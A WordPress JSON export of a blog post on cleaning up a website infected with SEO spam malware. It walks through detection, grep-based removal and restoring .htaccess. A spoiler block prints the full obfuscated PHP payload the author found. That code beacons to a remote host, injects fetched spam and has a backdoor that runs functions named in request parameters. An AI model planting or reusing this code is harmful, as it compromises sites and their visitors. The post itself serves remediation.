<input type="hidden" id="_wpnonce" name="_wpnonce" value="287a36aecf" /><input type="hidden" name="_wp_http_referer" value="/blog/wp-json/wp/v2/posts/2992" /><input type="hidden" id="_wpnonce" name="_wpnonce" value="287a36aecf" /><input type="hidden" name="_wp_http_referer" value="/blog/wp-json/wp/v2/posts/2992" />{"id":2992,"date":"2015-01-08T17:17:10","date_gmt":"2015-01-08T06:17:10","guid":{"rendered":"https:\/\/www.businesslegions.com\/blog\/?p=2992"},"modified":"2015-01-09T00:13:46","modified_gmt":"2015-01-08T13:13:46","slug":"cleanup-website-hacked-seo-spam","status":"publish","type":"post","link":"https:\/\/www.businesslegions.com\/blog\/2015\/01\/08\/cleanup-website-hacked-seo-spam\/","title":{"rendered":"How to cleanup Website Hacked with SEO Spam"},"content":{"rendered":"<!--CusAds0--><p>I recently looked at an issue with a website being infected with a malware called SEO Spam. This was reported by Google Webmaster Tools (one of the benefits of adding your website to Webmaster Tools) as shown below:<\/p>\n[blockquote align=&#8221;left&#8221; ]DON&#8217;T IGNORE THESE MESSAGES[\/blockquote]\n<p><a href=\"https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Google-Webmaster-tools.png?strip=all&w=2560\"><img decoding=\"async\" class=\"alignnone size-full wp-image-2993\" src=\"https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Google-Webmaster-tools.png?strip=all\" alt=\"Google Webmaster tools\" width=\"550\" height=\"682\" srcset=\"https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Google-Webmaster-tools.png?strip=all 550w, https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Google-Webmaster-tools-242x300.png?strip=all 242w, https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Google-Webmaster-tools.png?strip=all&amp;w=110 110w, https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Google-Webmaster-tools.png?strip=all&amp;w=330 330w, https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Google-Webmaster-tools.png?strip=all&amp;w=440 440w\" sizes=\"(max-width: 550px) 100vw, 550px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>I decided to confirm this and used a website called Sucuri to scan the website and below was the results:<\/p>\n<p><a href=\"https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Free-Website-Malware-Scanner.png?strip=all&w=2560\"><img decoding=\"async\" class=\"alignnone  wp-image-2994\" src=\"https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Free-Website-Malware-Scanner.png?strip=all\" alt=\"Free Website Malware Scanner\" width=\"588\" height=\"503\" srcset=\"https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Free-Website-Malware-Scanner.png?strip=all 813w, https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Free-Website-Malware-Scanner-300x257.png?strip=all 300w, https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Free-Website-Malware-Scanner.png?strip=all&amp;w=162 162w, https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Free-Website-Malware-Scanner.png?strip=all&amp;w=487 487w, https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Free-Website-Malware-Scanner.png?strip=all&amp;w=650 650w\" sizes=\"(max-width: 588px) 100vw, 588px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>To investigate further you need to have file access to your hosting account. The website that was hacked was hosted on a Windows VPS (Windows Server 2012).<\/p>\n<p>Below\u00a0were the steps taken to remove the malware:<\/p>\n[list icon=&#8221;dot&#8221;]Login to the VPS and change all password. Check to make sure there are no suspicious accounts created[\/list]\n[list icon=&#8221;dot&#8221;]Open your website in a web browser and right click and select &#8220;View Page Source&#8221;[\/list]\n[list icon=&#8221;dot&#8221;]Check the code in the header to see if there is anything unusual, in particular check to see if there are links to other websites as that&#8217;s what the function of the SEO Spam malware[\/list]\n[list icon=&#8221;dot&#8221;]Use a grep tool to perform text scans.[\/list]\n[list icon=&#8221;dot&#8221;]Perform a quick check on your files and make see whether there has been any recent files that were modified\/saved. Check the content of these files and see if there is anything usual.[\/list]\n[list icon=&#8221;dot&#8221;]In my particular case I noticed this unusual code (in particular the random text):[\/list]\n<p><a href=\"https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Malware-code-found.png?strip=all&w=2560\"><img decoding=\"async\" class=\"alignnone wp-image-2995 \" src=\"https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Malware-code-found.png?strip=all\" alt=\"Malware code found\" width=\"1004\" height=\"320\" srcset=\"https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Malware-code-found.png?strip=all 1859w, https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Malware-code-found-300x96.png?strip=all 300w, https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Malware-code-found.png?strip=all&amp;w=371 371w, https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Malware-code-found.png?strip=all&amp;w=743 743w, https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Malware-code-found.png?strip=all&amp;w=1115 1115w, https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Malware-code-found.png?strip=all&amp;w=1487 1487w, https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/Malware-code-found.png?strip=all&amp;w=450 450w\" sizes=\"(max-width: 960px) 100vw, 960px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n[colorbox title=&#8221;What is this code?&#8221; color=&#8221;#333333&#8243;]This appears to be code converted to Base64 format. This makes it harder for scanning tools to find the code. You can use a website called BASE64decode.org to decode the code[\/colorbox]<!--CusAds0-->\n[spoiler title=&#8221;If you&#8217;re interested expand to see\u00a0\u00a0actual code&#8221;]The hackers were quite clever and decoded the parts of the code again: $GLOBALS[&#8216;_1201235823_&#8217;]=Array(base64_decode(&#8216;ZXJyb3J&#8217; .&#8217;fc&#8217; .&#8217;mV&#8217; .&#8217;wb&#8217; .&#8217;3J0aW5n&#8217;),base64_decode(&#8216;aW5p&#8217; .&#8217;X3Nl&#8217; .&#8217;d&#8217; .&#8217;A==&#8217;),base64_decode(&#8216;cHJl&#8217; .&#8217;Z&#8217; .&#8217;1&#8242; .&#8217;9tYXRjaA==&#8217;),base64_decode(&#8216;Zmls&#8217; .&#8217;Z&#8217; .&#8217;V9nZXRfY&#8217; .&#8217;29udGVudHM&#8217; .&#8217;=&#8217;),base64_decode(&#8216;bX&#8217; .&#8217;Rf&#8217; .&#8217;cm&#8217; .&#8217;Fu&#8217; .&#8217;ZA==&#8217;),base64_decode(&#8221; .&#8217;dXJsZW5jb&#8217; .&#8217;2Rl&#8217;),base64_decode(&#8216;d&#8217; .&#8217;X&#8217; .&#8217;JsZW5jb2Rl&#8217;),base64_decode(&#8216;dXJs&#8217; .&#8217;ZW5j&#8217; .&#8217;b2&#8242; .&#8217;Rl&#8217;),base64_decode(&#8216;bWQ1&#8242;),base64_decode(&#8221; .&#8217;aW5pX2&#8242; .&#8217;dl&#8217; .&#8217;dA==&#8217;),base64_decode(&#8221; .&#8217;Zml&#8217; .&#8217;sZV9n&#8217; .&#8217;ZXRfY&#8217; .&#8217;29udGVudH&#8217; .&#8217;M=&#8217;),base64_decode(&#8216;c3&#8242; .&#8217;Ry&#8217; .&#8217;b&#8217; .&#8217;GVu&#8217;),base64_decode(&#8216;ZnVuY3Rpb&#8217; .&#8217;25fZXhpc3Rz&#8217;),base64_decode(&#8216;Y3Vyb&#8217; .&#8217;F9pb&#8217; .&#8217;ml0&#8242;),base64_decode(&#8221; .&#8217;Y3Vyb&#8217; .&#8217;F9zZXRv&#8217; .&#8217;c&#8217; .&#8217;HQ=&#8217;),base64_decode(&#8221; .&#8217;Y3Vy&#8217; .&#8217;bF&#8217; .&#8217;9z&#8217; .&#8217;ZXRvcH&#8217; .&#8217;Q=&#8217;),base64_decode(&#8216;Y3VybF9le&#8217; .&#8217;GVj&#8217;),base64_decode(&#8216;c3Ry&#8217; .&#8217;c&#8217; .&#8217;m&#8217; .&#8217;Noc&#8217; .&#8217;g==&#8217;),base64_decode(&#8216;Y3&#8242; .&#8217;Vyb&#8217; .&#8217;F&#8217; .&#8217;9jbG9zZQ==&#8217;),base64_decode(&#8221; .&#8217;Z&#8217; .&#8217;nNvY2tvcGVu&#8217;),base64_decode(&#8216;YXJyYXlfcHJvZ&#8217; .&#8217;HV&#8217; .&#8217;jdA==&#8217;),base64_decode(&#8216;YXJy&#8217; .&#8217;Y&#8217; .&#8217;X&#8217; .&#8217;lfcmVkd&#8217; .&#8217;WN&#8217; .&#8217;l&#8217;),base64_decode(&#8216;Zn&#8217; .&#8217;dya&#8217; .&#8217;XRl&#8217;),base64_decode(&#8216;ZmV&#8217; .&#8217;vZg==&#8217;),base64_decode(&#8216;Zm&#8217; .&#8217;dldHM=&#8217;),base64_decode(&#8216;c3Ry&#8217; .&#8217;cG9z&#8217;),base64_decode(&#8216;Y&#8217; .&#8217;XJ&#8217; .&#8217;y&#8217; .&#8217;YXl&#8217; .&#8217;f&#8217; .&#8217;a2V5cw==&#8217;),base64_decode(&#8216;Zm&#8217; .&#8217;Nsb3&#8242; .&#8217;Nl&#8217;),base64_decode(&#8216;cH&#8217; .&#8217;JlZ&#8217; .&#8217;19z&#8217; .&#8217;cG&#8217; .&#8217;x&#8217; .&#8217;pdA==&#8217;),base64_decode(&#8216;c3Ry&#8217; .&#8217;aXBzbG&#8217; .&#8217;FzaGVz&#8217;)); function _1807178670($i){$a=Array(&#8221; .&#8217;ZGlzcGxheV9lcnJvcnM=&#8217;,&#8217;M&#8217; .&#8217;A==&#8217;,&#8217;Y&#8217; .&#8217;2x&#8217; .&#8217;pZW50X2NoZWNr&#8217;,&#8217;Y&#8217; .&#8217;2x&#8217; .&#8217;pZW&#8217; .&#8217;50X2NoZ&#8217; .&#8217;W&#8217; .&#8217;Nr&#8217;,&#8217;S&#8217; .&#8217;FRU&#8217; .&#8217;UF&#8217; .&#8217;9BQ0N&#8217; .&#8217;F&#8217; .&#8217;U&#8217; .&#8217;FRfQ0hBUlNFVA==&#8217;,&#8217;IS4hdQ==&#8217;,&#8217;U0&#8242; .&#8217;NSS&#8217; .&#8217;VBUX0ZJT&#8217; .&#8217;EVOQU1F&#8217;,&#8221; .&#8217;VVRGLTg=&#8217;,&#8221; .&#8217;d2luZ&#8217; .&#8217;G93cy0x&#8217; .&#8217;MjU&#8217; .&#8217;x&#8217;,&#8217;SFR&#8217; .&#8217;UU&#8217; .&#8217;F9&#8242; .&#8217;BQ0NFUFRfQ0hBUlNFVA==&#8217;,&#8217;U0VSVkV&#8217; .&#8217;SX05BTU&#8217; .&#8217;U=&#8217;,&#8217;U&#8217; .&#8217;kV&#8217; .&#8217;R&#8217; .&#8217;VUVTVF9VUkk=&#8217;,&#8217;eGR&#8217; .&#8217;rcg==&#8217;,&#8217;SF&#8217; .&#8217;RUUF9V&#8217; .&#8217;U0&#8242; .&#8217;VSX0FHR&#8217; .&#8217;U5U&#8217;,&#8217;UkVN&#8217; .&#8217;T1RFX0FERFI=&#8217;,&#8221; .&#8217;a&#8217; .&#8217;WttZnll&#8217; .&#8217;dXJuYW1kanMucnU=&#8217;,&#8217;L2dld&#8217; .&#8217;C5waHA\/Z&#8217; .&#8217;D0=&#8217;,&#8217;JnU9&#8242;,&#8217;JmM9&#8242;,&#8217;Jm&#8217; .&#8217;k&#8217; .&#8217;9M&#8217; .&#8217;SZpcD0&#8242; .&#8217;=&#8217;,&#8217;Jmg&#8217; .&#8217;9&#8242;,&#8217;O&#8217; .&#8217;DdlOWVkYjFlOTdlOTUy&#8217; .&#8217;Yzhh&#8217; .&#8217;ZTZkMDM0YjFkMD&#8217; .&#8217;Q&#8217; .&#8217;5NjA=&#8217;,&#8217;MQ==&#8217;,&#8217;Y3Nm&#8217;,&#8221; .&#8217;YWxsb&#8217; .&#8217;3dfdXJsX2&#8242; .&#8217;ZvcGVu&#8217;,&#8217;aHR0cDov&#8217; .&#8217;L&#8217; .&#8217;w&#8217; .&#8217;==&#8217;,&#8217;Y3VybF9pbml0&#8242;,&#8217;a&#8217; .&#8217;H&#8217; .&#8217;R0cDo&#8217; .&#8217;vLw&#8217; .&#8217;==&#8217;,&#8217;R0V&#8217; .&#8217;U&#8217; .&#8217;I&#8217; .&#8217;A&#8217; .&#8217;==&#8217;,&#8221; .&#8217;I&#8217; .&#8217;EhUVF&#8217; .&#8217;Av&#8217; .&#8217;MS4x&#8217; .&#8217;DQo=&#8217;,&#8217;SG9&#8242; .&#8217;zdDo&#8217; .&#8217;g&#8217;,&#8221; .&#8217;DQo=&#8217;,&#8217;Q29ubm&#8217; .&#8217;VjdG&#8217; .&#8217;lv&#8217; .&#8217;bjog&#8217; .&#8217;Q2xvc&#8217; .&#8217;2U&#8217; .&#8217;NC&#8217; .&#8217;g0K&#8217;,&#8221;,&#8221; .&#8217;dm5r&#8217; .&#8217;c3Bj&#8217; .&#8217;bndmYWpybm&#8217; .&#8217;FwbGY=&#8217;,&#8217;Z&#8217; .&#8217;GN3&#8242; .&#8217;eg==&#8217;,&#8217;L1x&#8217; .&#8217;SX&#8217; .&#8217;F&#8217; .&#8217;Iv&#8217;,&#8217;cA=&#8217; .&#8217;=&#8217;,&#8217;NmY&#8217; .&#8217;w&#8217; .&#8217;Yz&#8217; .&#8217;YwYjc&#8217; .&#8217;=&#8217;,&#8217;Zg==&#8217;,&#8221; .&#8217;Yw==&#8217;);return base64_decode($a[$i]);} @$GLOBALS[&#8216;_1201235823_&#8217;][0](round(0));@$GLOBALS[&#8216;_1201235823_&#8217;][1](_1807178670(0),_1807178670(1));$t1e69_0=round(0+1469.5+1469.5);if(!isset($t1e69_1)){if(!empty($_COOKIE[_1807178670(2)]))die($_COOKIE[_1807178670(3)]);if(!isset($t1e69_2[_1807178670(4)])){if($GLOBALS[&#8216;_1201235823_&#8217;][2](_1807178670(5),$GLOBALS[&#8216;_1201235823_&#8217;][3]($_SERVER[_1807178670(6)])))$t1e69_3=_1807178670(7);else $t1e69_3=_1807178670(8);}else{$t1e69_3=$t1e69_2[_1807178670(9)];if(round(0+4514.5+4514.5)&lt;$GLOBALS[&#8216;_1201235823_&#8217;][4](round(0+883+883+883+883+883),round(0+2304.5+2304.5)))$GLOBALS[&#8216;_1201235823_&#8217;][5]($_REQUEST,$_SERVER,$t1e69_4);}$t1e69_5=$_SERVER[_1807178670(10)] .$_SERVER[_1807178670(11)];$t1e69_6=_1807178670(12);$t1e69_7=$_SERVER[_1807178670(13)];$t1e69_4=$_SERVER[_1807178670(14)];$t1e69_8=_1807178670(15);$t1e69_9=_1807178670(16) .$GLOBALS[&#8216;_1201235823_&#8217;][6]($t1e69_5) ._1807178670(17) .$GLOBALS[&#8216;_1201235823_&#8217;][7]($t1e69_7) ._1807178670(18) .$t1e69_3 ._1807178670(19) .$t1e69_4 ._1807178670(20) .$GLOBALS[&#8216;_1201235823_&#8217;][8](_1807178670(21) .$t1e69_5 .$t1e69_7 .$t1e69_3 ._1807178670(22));$t1e69_10=_1807178670(23);if($GLOBALS[&#8216;_1201235823_&#8217;][9](_1807178670(24))== round(0+0.2+0.2+0.2+0.2+0.2)){$t1e69_1=$GLOBALS[&#8216;_1201235823_&#8217;][10](_1807178670(25) .$t1e69_8 .$t1e69_9);}if($GLOBALS[&#8216;_1201235823_&#8217;][11]($t1e69_1)&lt;round(0+10)){if($GLOBALS[&#8216;_1201235823_&#8217;][12](_1807178670(26))){$t1e69_11=$GLOBALS[&#8216;_1201235823_&#8217;][13](_1807178670(27) .$t1e69_8 .$t1e69_9);$GLOBALS[&#8216;_1201235823_&#8217;][14]($t1e69_11,42,FALSE);$GLOBALS[&#8216;_1201235823_&#8217;][15]($t1e69_11,19913,TRUE);$t1e69_1=$GLOBALS[&#8216;_1201235823_&#8217;][16]($t1e69_11);while(round(0+1149)-round(0+1149))$GLOBALS[&#8216;_1201235823_&#8217;][17]($t1e69_9,$t1e69_5,$t1e69_2,$t1e69_12);$GLOBALS[&#8216;_1201235823_&#8217;][18]($t1e69_11);}else{$t1e69_13=$GLOBALS[&#8216;_1201235823_&#8217;][19]($t1e69_8,round(0+20+20+20+20),$t1e69_12,$t1e69_14,round(0+15+15));if((round(0+1569.5+1569.5)+round(0+787+787))&gt;round(0+3139)|| $GLOBALS[&#8216;_1201235823_&#8217;][20]($t1e69_8,$t1e69_4,$t1e69_15,$t1e69_12,$t1e69_11));else{$GLOBALS[&#8216;_1201235823_&#8217;][21]($t1e69_7,$t1e69_15,$t1e69_14);}if($t1e69_13){$t1e69_16=_1807178670(28) .$t1e69_9 ._1807178670(29);$t1e69_16 .= _1807178670(30) .$t1e69_8 ._1807178670(31);$t1e69_16 .= _1807178670(32);$GLOBALS[&#8216;_1201235823_&#8217;][22]($t1e69_13,$t1e69_16);$t1e69_15=_1807178670(33);while(!$GLOBALS[&#8216;_1201235823_&#8217;][23]($t1e69_13)){$t1e69_15 .= $GLOBALS[&#8216;_1201235823_&#8217;][24]($t1e69_13,round(0+42.666666666667+42.666666666667+42.666666666667));if($GLOBALS[&#8216;_1201235823_&#8217;][25](_1807178670(34),_1807178670(35))!==false)$GLOBALS[&#8216;_1201235823_&#8217;][26]($t1e69_5);}$GLOBALS[&#8216;_1201235823_&#8217;][27]($t1e69_13);list($t1e69_17,$t1e69_1)=$GLOBALS[&#8216;_1201235823_&#8217;][28](_1807178670(36),$t1e69_15,round(0+0.66666666666667+0.66666666666667+0.66666666666667));$t1e69_18=round(0+4383);}}}if(@$_REQUEST[_1807178670(37)]== _1807178670(38))@$_REQUEST[_1807178670(39)]($GLOBALS[&#8216;_1201235823_&#8217;][29]($_REQUEST[_1807178670(40)]));}echo@$t1e69_1; [\/spoiler]\n[list icon=&#8221;dot&#8221;]Use a grep tool to search for text within files in directories and perform a search for some of the code that you found. In my case, I used a tool called grepwin and performed a exact search for the code. Grepwin returned hundred of files (namely index.html, header.php, header.html, footer.html, footer.php and main.html). I then used the same tool to replace the above code with an empty space (this quickly removed all the malware code from the files).[\/list]\n<p>&nbsp;<\/p>\n[list icon=&#8221;dot&#8221;]The other file that I found that was modified recently was .htaccess and had the following code.[\/list]\n<p><a href=\"https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/htaccess-file-hacked.png?strip=all&w=2560\"><img decoding=\"async\" class=\"alignnone size-full wp-image-2996\" src=\"https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/htaccess-file-hacked.png?strip=all\" alt=\"htaccess file hacked\" width=\"538\" height=\"195\" srcset=\"https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/htaccess-file-hacked.png?strip=all 538w, https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/htaccess-file-hacked-300x109.png?strip=all 300w, https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/htaccess-file-hacked.png?strip=all&amp;w=107 107w, https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/htaccess-file-hacked.png?strip=all&amp;w=215 215w, https:\/\/cdn.businesslegions.com\/blog\/wp-content\/uploads\/2015\/01\/htaccess-file-hacked.png?strip=all&amp;w=430 430w\" sizes=\"(max-width: 538px) 100vw, 538px\" \/><\/a><\/p>\n<p>Fortunately I restored a backed up copy of this file<\/p>\n[list icon=&#8221;dot&#8221;]I also installed malware scanner on the server to make sure there were no other &lt;alware installed. None were reported after the scan and rescan from sucuri also came back negative.[\/list]\n[colorbox title=&#8221;Useful Sites&#8221; color=&#8221;#0080c0&#8243;]\n<p><strong><a title=\"Sucuri\" href=\"http:\/\/sitecheck.sucuri.net\/\" target=\"_blank\">Sucuri Sitecheck<\/a><\/strong> &#8211; checks websites for malware<\/p>\n<p><strong><a title=\"Base64 Decode and Encode\" href=\"www.base64decode.org\" target=\"_blank\">Base64 Decode and Encode<\/a><\/strong> &#8211; site to decode Base64<\/p>\n<p><strong>Malwarebytes<\/strong> &#8211; Software tool to remove malware<\/p>\n<p><strong><a title=\"Grepwin\" href=\"http:\/\/stefanstools.sourceforge.net\/grepWin.html\">Grepwin<\/a><\/strong> &#8211; A windows based tool to perform search and replace<\/p>\n[\/colorbox]\n[note color=&#8221;#18e7e1&#8243;]Hopefully this will help others and if you have any questions please leave me a comment and I will try to help.[\/note]\n<div class=\"lt-box\" style=\"border:1px solid #1d6a9e\"><div class=\"lt-box-title\" style=\"background-color:#2485C6;border-top:1px solid #a7cee8;text-shadow:1px 1px 0 #0b283b\">DO YOU LIKE WHAT YOU'VE READ?<\/div><div class=\"lt-box-content\">Join our subscription list and receive our content right in your mailbox. If you like to receive some Great deals our Freebies then subscribe now!\r\n\r\n<p><div class=\"tnp tnp-subscription \">\n<form method=\"post\" action=\"https:\/\/www.businesslegions.com\/blog\/wp-admin\/admin-ajax.php?action=tnp&amp;na=s\">\n<input type=\"hidden\" name=\"nlang\" value=\"\">\n<div class=\"tnp-field tnp-field-firstname\"><label for=\"tnp-1\">Name<\/label>\n<input class=\"tnp-name\" type=\"text\" name=\"nn\" id=\"tnp-1\" value=\"\" placeholder=\"\"><\/div>\n<div class=\"tnp-field tnp-field-email\"><label for=\"tnp-2\">Email<\/label>\n<input class=\"tnp-email\" type=\"email\" name=\"ne\" id=\"tnp-2\" value=\"\" placeholder=\"\" required><\/div>\n<div class=\"tnp-field tnp-field-button\" style=\"text-align: left\"><input class=\"tnp-submit\" type=\"submit\" value=\"Subscribe\" style=\"\">\n<\/div>\n<\/form>\n<\/div>\n<\/p>\r\n\r\n<\/div><\/div><!--CusAds0-->\n<div style=\"font-size: 0px; height: 0px; line-height: 0px; margin: 0; padding: 0; clear: both;\"><\/div>","protected":false},"excerpt":{"rendered":"<p>I recently looked at an issue with a website being infected with a malware called SEO Spam. This was reported by Google Webmaster Tools (one of the benefits of adding your website to Webmaster Tools) as shown below: [blockquote align=&#8221;left&#8221; ]DON&#8217;T IGNORE THESE MESSAGES[\/blockquote] &nbsp; I decided to confirm this and used a website called [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2994,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1043],"tags":[1739,1734,1733,1737,1736,1735,1738,94],"class_list":["post-2992","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-websites","tag-base64decode","tag-cleanup","tag-hacked","tag-help","tag-malware","tag-scan","tag-sucuri","tag-website"],"_links":{"self":[{"href":"https:\/\/www.businesslegions.com\/blog\/wp-json\/wp\/v2\/posts\/2992","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.businesslegions.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.businesslegions.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.businesslegions.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.businesslegions.com\/blog\/wp-json\/wp\/v2\/comments?post=2992"}],"version-history":[{"count":14,"href":"https:\/\/www.businesslegions.com\/blog\/wp-json\/wp\/v2\/posts\/2992\/revisions"}],"predecessor-version":[{"id":3012,"href":"https:\/\/www.businesslegions.com\/blog\/wp-json\/wp\/v2\/posts\/2992\/revisions\/3012"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.businesslegions.com\/blog\/wp-json\/wp\/v2\/media\/2994"}],"wp:attachment":[{"href":"https:\/\/www.businesslegions.com\/blog\/wp-json\/wp\/v2\/media?parent=2992"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.businesslegions.com\/blog\/wp-json\/wp\/v2\/categories?post=2992"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.businesslegions.com\/blog\/wp-json\/wp\/v2\/tags?post=2992"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}